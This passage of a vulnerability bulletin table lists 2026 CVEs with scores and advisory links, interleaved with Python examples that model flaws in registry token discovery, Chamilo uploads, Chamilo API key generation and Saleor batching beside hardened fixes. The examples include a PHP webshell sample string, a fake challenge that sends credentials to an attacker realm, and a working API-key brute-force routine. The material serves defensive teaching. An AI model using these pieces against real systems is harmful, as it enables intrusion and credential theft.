    <td><a href="https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html" target="_blank" rel="noopener">https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html</a></td>
    </tr>

    <td class="vendor-product">NI--LabVIEW</td>
    <td>There is a memory corruption vulnerability due to an out-of-bounds read in sentry_transaction_context_set_operation() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32863" target="_blank" rel="noopener">CVE-2026-32863</a></td>

    <td><a href="https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html" target="_blank" rel="noopener">https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html</a></td>
    </tr>

    <td class="vendor-product">NI--LabVIEW</td>
    <td>There is a memory corruption vulnerability due to an out-of-bounds read in mgcore_SH_25_3!aligned_free() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32864" target="_blank" rel="noopener">CVE-2026-32864</a></td>

    <td><a href="https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html" target="_blank" rel="noopener">https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html</a></td>
    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32894" target="_blank" rel="noopener">CVE-2026-32894</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519</a></td>

    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32930" target="_blank" rel="noopener">CVE-2026-32930</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d</a></td>

    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32931" target="_blank" rel="noopener">CVE-2026-32931</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3</a></td>

    </tr>

    <td class="vendor-product">aces--Loris</td>
    <td>LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections for the MRI feedback popup window of the imaging browser. Attackers can use SQL injection to access/alter data on the server. This vulnerability is fixed in 27.0.3 and 28.0.1.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33350" target="_blank" rel="noopener">CVE-2026-33350</a></td>

    <td><a href="https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh" target="_blank" rel="noopener">https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh</a></td>
    </tr>

    <td class="vendor-product">Elastic--Kibana</td>
    <td>Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetching full configuration objects and returning them directly, bypassing the authorization checks enforced by the dedicated settings APIs.</td>
    <td>2026-04-08</td>
    <td>7.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33461" target="_blank" rel="noopener">CVE-2026-33461</a></td>

    <td><a href="https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812" target="_blank" rel="noopener">https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812</a></td>
    </tr>

    <td class="vendor-product">distribution--distribution</td>
    <td>Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. The realm URL from a bearer challenge is used without validating that it matches the upstream registry host. As a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL. This vulnerability is fixed in 3.1.0.</td>
    <td>2026-04-06</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33540" target="_blank" rel="noopener">CVE-2026-33540</a></td>

    <td><a href="https://github.com/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r" target="_blank" rel="noopener">https://github.com/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r</a></td>
    </tr>
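The token-endpoint discovery in the CVE-2026-33540 entry, as an added example (not distribution's code, which is Go, and not its 3.1.0 fix, whose exact rule is not given here): a parser for a `WWW-Authenticate: Bearer realm=...` challenge and a check that only releases the upstream credentials to a realm whose host is the upstream registry itself or one of an explicit allow-list. The allow-list exists because public registries commonly serve tokens from a separate auth host, so a bare same-host rule would break legitimate upstreams. The challenge strings and host names are constructed.

```python
"""Added example, not distribution code: parse a registry token challenge
and refuse to send upstream credentials to an unexpected realm."""
import re
from typing import Dict, Iterable
from urllib.parse import urlsplit

# key="value" pairs; values may contain escaped quotes.
_PARAM = re.compile(r'(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')


def parse_bearer_challenge(header: str) -> Dict[str, str]:
    """Parse `Bearer realm="...",service="...",scope="..."` into a dict."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "bearer":
        raise ValueError(f"not a Bearer challenge: {scheme!r}")
    return {k.lower(): v.replace('\\"', '"') for k, v in _PARAM.findall(params)}


def token_endpoint(upstream: str, challenge: str,
                   trusted_realm_hosts: Iterable[str] = ()) -> str:
    """Return the realm URL that may receive the upstream credentials.

    Accepted only if the realm is https and its host is the upstream
    registry host or one of trusted_realm_hosts; anything else (including
    an http realm, which would expose the basic-auth header) is refused."""
    realm = parse_bearer_challenge(challenge).get("realm")
    if not realm:
        raise ValueError("challenge has no realm")
    r, u = urlsplit(realm), urlsplit(upstream)
    if r.scheme != "https":
        raise ValueError(f"realm must be https, got {realm}")
    allowed = {u.hostname, *trusted_realm_hosts}
    if r.hostname not in allowed:
        raise ValueError(f"realm host {r.hostname!r} not in {sorted(allowed)}")
    return realm


# Constructed challenges: one from the genuine upstream, one an attacker
# (hostile upstream or MitM) would return to harvest the credentials.
GOOD = ('Bearer realm="https://auth.registry.example/token",'
        'service="registry.example",scope="repository:app/web:pull"')
EVIL = ('Bearer realm="https://collector.attacker.test/token",'
        'service="registry.example",scope="repository:app/web:pull"')


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True
```

Operators running a pull-through cache against a registry whose auth lives on another host therefore need to configure that host explicitly; a cache that silently trusts whatever realm the upstream names is trusting the network path as well.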

    <td class="vendor-product">themeum--Tutor LMS eLearning and online course solution</td>
    <td>The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data-&gt;user_id`) without verifying the requester's identity or ownership. Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3360" target="_blank" rel="noopener">CVE-2026-3360</a></td>

    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059</a><br><a href="https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php</a></td>
    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress - including score, status, completion, and time - without verifying that the requesting user matches the target user ID. Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33702" target="_blank" rel="noopener">CVE-2026-33702</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551</a></td>

    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33704" target="_blank" rel="noopener">CVE-2026-33704</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00</a></td>

    </tr>
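The two upload-filter mistakes in the CVE-2026-32931 entry (trusting the client's Content-Type and keeping the client's extension) and the CVE-2026-33704 entry (a deny-list that rewrites .php but lets .pht through), as one added example that is not Chamilo's code and not its fixes: each weak check is modelled in a few lines beside an allow-list check that ignores the client's Content-Type, requires exactly one extension, sniffs the file's leading bytes, and stores under a server-chosen name. The sample file contents, the extension table and the helper names are constructed for the example.

```python
"""Added example, not Chamilo code: deny-list and Content-Type upload
checks beside an allow-list check.  Sample files are constructed."""
import secrets
from typing import Optional

PHP_SHELL = b"<?php system($_GET['c']); ?>"
MP3_FILE = b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\xff\xfb" + b"\x00" * 32


def vulnerable_sound_upload(filename: str, client_content_type: str) -> Optional[str]:
    """Pattern behind CVE-2026-32931: the header is attacker-supplied, and
    the stored name keeps whatever extension the client sent."""
    if client_content_type not in ("audio/mpeg", "audio/ogg", "audio/wav"):
        return None
    return filename                      # "shell.php" lands in a web-served dir


def vulnerable_bigupload_name(key: str) -> str:
    """Pattern behind CVE-2026-33704: a deny-list that only knows .php."""
    return key[:-4] + ".phps" if key.endswith(".php") else key


# Allow-list for the hardened path: extension -> accepted magic prefixes.
AUDIO_TYPES = {
    ".mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
    ".ogg": (b"OggS",),
    ".wav": (b"RIFF",),
}


def hardened_upload(filename: str, data: bytes) -> str:
    """Accept only allow-listed audio, judged from the bytes, never from the
    client's Content-Type; store under a server-chosen random name."""
    name = filename.lower()
    if name.count(".") != 1:             # rejects "x.mp3.php" and "x.php.mp3"
        raise ValueError("exactly one extension required")
    ext = "." + name.rsplit(".", 1)[1]
    if ext not in AUDIO_TYPES:
        raise ValueError(f"extension {ext} not allowed")
    if not data.startswith(AUDIO_TYPES[ext]):
        raise ValueError("content does not match declared audio type")
    return secrets.token_hex(16) + ext


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True
```

Even the allow-list is only half the control: the .pht case shows that the web server, not the application, decides what executes, so the upload directory should sit outside the document root or have script handlers disabled for it regardless of what the filter admits.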

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33706" target="_blank" rel="noopener">CVE-2026-33706</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127</a></td>

    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33710" target="_blank" rel="noopener">CVE-2026-33710</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d</a></td>

    </tr>
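The key formula quoted in the CVE-2026-33710 entry, as an added example (not Chamilo's code): a reimplementation of md5(timestamp + user_id*5 - 10000), the search an attacker needs to recover a key from an approximate creation time, and the CSPRNG replacement. It assumes PHP's md5() receives the integer sum as its decimal string, that user_id is known or enumerable (they are small sequential integers), and that the attacker can test candidates against the API, modelled here by a local callback that counts attempts. The timestamps are constructed.

```python
"""Added example, not Chamilo code: how little entropy the advisory's key
formula has, and the search an attacker needs.  Assumes PHP coerces the
integer sum to its decimal string before md5().  Timestamps are constructed."""
import hashlib
import secrets
from typing import Callable, Dict, Optional


def weak_api_key(user_id: int, created_at: int) -> str:
    """md5(time() + user_id*5 - rand(10000, 10000)); rand(10000, 10000) == 10000."""
    return hashlib.md5(str(created_at + user_id * 5 - 10000).encode()).hexdigest()


def brute_force_key(user_id: int, approx_time: int, window: int,
                    accepts: Callable[[str], bool]) -> Optional[str]:
    """Try every key the formula can have produced within +/- window seconds
    of approx_time; `accepts` stands in for an API call with the candidate."""
    for t in range(approx_time - window, approx_time + window + 1):
        candidate = weak_api_key(user_id, t)
        if accepts(candidate):
            return candidate
    return None


def strong_api_key() -> str:
    """256 bits from the OS CSPRNG: the attacker's knowledge of the user and
    the creation time no longer narrows the search."""
    return secrets.token_hex(32)


def demo(user_id: int = 42, created_at: int = 1_775_000_000,
         window: int = 3600) -> Dict[str, int]:
    """Attacker guesses the creation time 15 minutes late and searches an
    hour either side; returns whether the key fell and how many API calls
    that took."""
    real = weak_api_key(user_id, created_at)
    attempts = 0

    def api_accepts(key: str) -> bool:
        nonlocal attempts
        attempts += 1
        return secrets.compare_digest(key, real)

    found = brute_force_key(user_id, created_at + 900, window, api_accepts)
    return {"recovered": int(found == real), "attempts": attempts,
            "search_space": 2 * window + 1}
```

Note also that the formula collides across users: user 1's key from one second equals user 2001's key from 10000 seconds earlier, so a key is not even bound to the account it was issued for.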

    <td class="vendor-product">saleor--saleor</td>
    <td>Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit on the number of operations. This allowed an unauthenticated attacker to send many operations in a single HTTP request (bypassing the per-query complexity limit) to exhaust resources. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118.</td>
    <td>2026-04-08</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33756" target="_blank" rel="noopener">CVE-2026-33756</a></td>

    <td><a href="https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244-qfpp" target="_blank" rel="noopener">https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244-qfpp</a><br><a href="https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64" target="_blank" rel="noopener">https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64</a><br><a href="https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8" target="_blank" rel="noopener">https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8</a><br><a href="https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a" target="_blank" rel="noopener">https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a</a><br><a href="https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8f43fa" target="_blank" rel="noopener">https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8f43fa</a><br><a href="https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464" target="_blank" rel="noopener">https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464</a></td>
    </tr>
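The batching gap in the CVE-2026-33756 entry, as an added example (not Saleor's code and not its fix): a guard that bounds both the number of operations in a JSON-array request and their summed complexity, so a per-query limit cannot be multiplied away by repeating a query that individually passes it. The complexity estimator is a deliberately crude stand-in (fields times the largest `first:` page size) for the real analyser a GraphQL server uses; the limits and the sample payloads are constructed.

```python
"""Added example, not Saleor code: bound both operation count and the
aggregate cost of a GraphQL batch.  Limits and payloads are constructed."""
import json
import re
from typing import Any, Callable, Dict, List

MAX_BATCH_OPERATIONS = 10          # assumed limits, not Saleor's values
MAX_TOTAL_COMPLEXITY = 5_000

_FIRST = re.compile(r"first:\s*(\d+)")


def selection_cost(op: Dict[str, Any]) -> int:
    """Stand-in for a complexity analyser: one point per selection set,
    multiplied by the largest `first:` page size requested."""
    query = op.get("query", "")
    fields = max(1, query.count("{"))
    page = max((int(n) for n in _FIRST.findall(query)), default=1)
    return fields * page


def check_batch(body: str, cost: Callable[[Dict[str, Any]], int] = selection_cost,
                max_ops: int = MAX_BATCH_OPERATIONS,
                max_total: int = MAX_TOTAL_COMPLEXITY) -> List[Dict[str, Any]]:
    """Return the operations to execute, or raise ValueError.  A single
    object is treated as a batch of one so both shapes share the limits."""
    payload = json.loads(body)
    ops = payload if isinstance(payload, list) else [payload]
    if len(ops) > max_ops:
        raise ValueError(f"batch of {len(ops)} operations exceeds {max_ops}")
    total = 0
    for op in ops:
        if not isinstance(op, dict) or not isinstance(op.get("query"), str):
            raise ValueError("malformed operation")
        total += cost(op)          # any per-operation limit still applies inside cost()
        if total > max_total:
            raise ValueError(f"aggregate complexity {total} exceeds {max_total}")
    return ops


# Constructed payloads: a modest batch, a flood of identical operations, and
# a batch whose operations each pass a per-query limit but not in aggregate.
QUERY = "{ products(first: 100) { edges { node { id name } } } }"   # cost 4 * 100
SMALL = json.dumps([{"query": QUERY}] * 3)
FLOOD = json.dumps([{"query": QUERY}] * 1_000)
BIG = json.dumps([{"query": QUERY.replace("100", "200")}] * 10)      # 10 * 800


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True
```

Counting operations alone is the minimum the entry calls for; summing cost across the batch is what makes the existing per-query limit meaningful again, since without it the attacker simply sends the largest permitted query as many times as the request body allows.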

    <td class="vendor-product">Juniper Networks--CTP OS</td>
    <td>A Weak Password Requirements vulnerability in the password management function of Juniper Networks CTP OS might allow an unauthenticated, network-based attacker to exploit weak passwords of local accounts and potentially take full control of the device. The password management menu enables the administrator to set password complexity requirements, but these settings are not saved. The issue can be verified with the menu option "Show password requirements". Failure to enforce the intended requirements can lead to weak passwords being used, which significantly increases the likelihood that an attacker can guess these and subsequently attain unauthorized access. This issue affects CTP OS versions 9.2R1 and 9.2R2.</td>
    <td>2026-04-09</td>
    <td>7.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33771" target="_blank" rel="noopener">CVE-2026-33771</a></td>

    <td><a href="https://kb.juniper.net/JSA107864" target="_blank" rel="noopener">https://kb.juniper.net/JSA107864</a></td>
    </tr>

    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and restart, which momentarily prevents new security associations (SAs) from being established. Repeated exploitation of this vulnerability causes a complete inability to establish new VPN connections. This issue affects Junos OS on SRX Series and MX Series: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S3, * 25.2 versions before 25.2R1-S2, 25.2R2.</td>
    <td>2026-04-09</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33778" target="_blank" rel="noopener">CVE-2026-33778</a></td>

    <td><a href="https://kb.juniper.net/JSA107868" target="_blank" rel="noopener">https://kb.juniper.net/JSA107868</a></td>
    </tr>

    <td class="vendor-product">Juniper Networks--Junos OS Evolved</td>
    <td>A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component. This issue affects Junos OS Evolved on PTX10004, PTX10008, PTX10016, with JNP10K-LC1201 or JNP10K-LC1202: * All versions before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-EVO, * 22.2-EVO versions before 22.2R3-S4-EVO, * 22.3-EVO versions before 22.3R3-S3-EVO, * 22.4-EVO versions before 22.4R3-S2-EVO, * 23.2-EVO versions before 23.2R2-EVO.</td>
    <td>2026-04-09</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33788" target="_blank" rel="noopener">CVE-2026-33788</a></td>

    <td><a href="https://kb.juniper.net/JSA107806" target="_blank" rel="noopener">https://kb.juniper.net/JSA107806</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. During NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart. This issue cannot be triggered using IPv4 or other IPv6 traffic. This issue affects Junos OS on SRX Series: * all versions before 21.2R3-S10, * all versions of 21.3, * from 21.4 before 21.4R3-S12, * all versions of 22.1, * from 22.2 before 22.2R3-S8, * all versions of 22.4, * from 22.4 before 22.4R3-S9, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S3, * from 25.2 before 25.2R1-S2, 25.2R2.</td>
    <td>2026-04-09</td>
    <td>7.5</td>
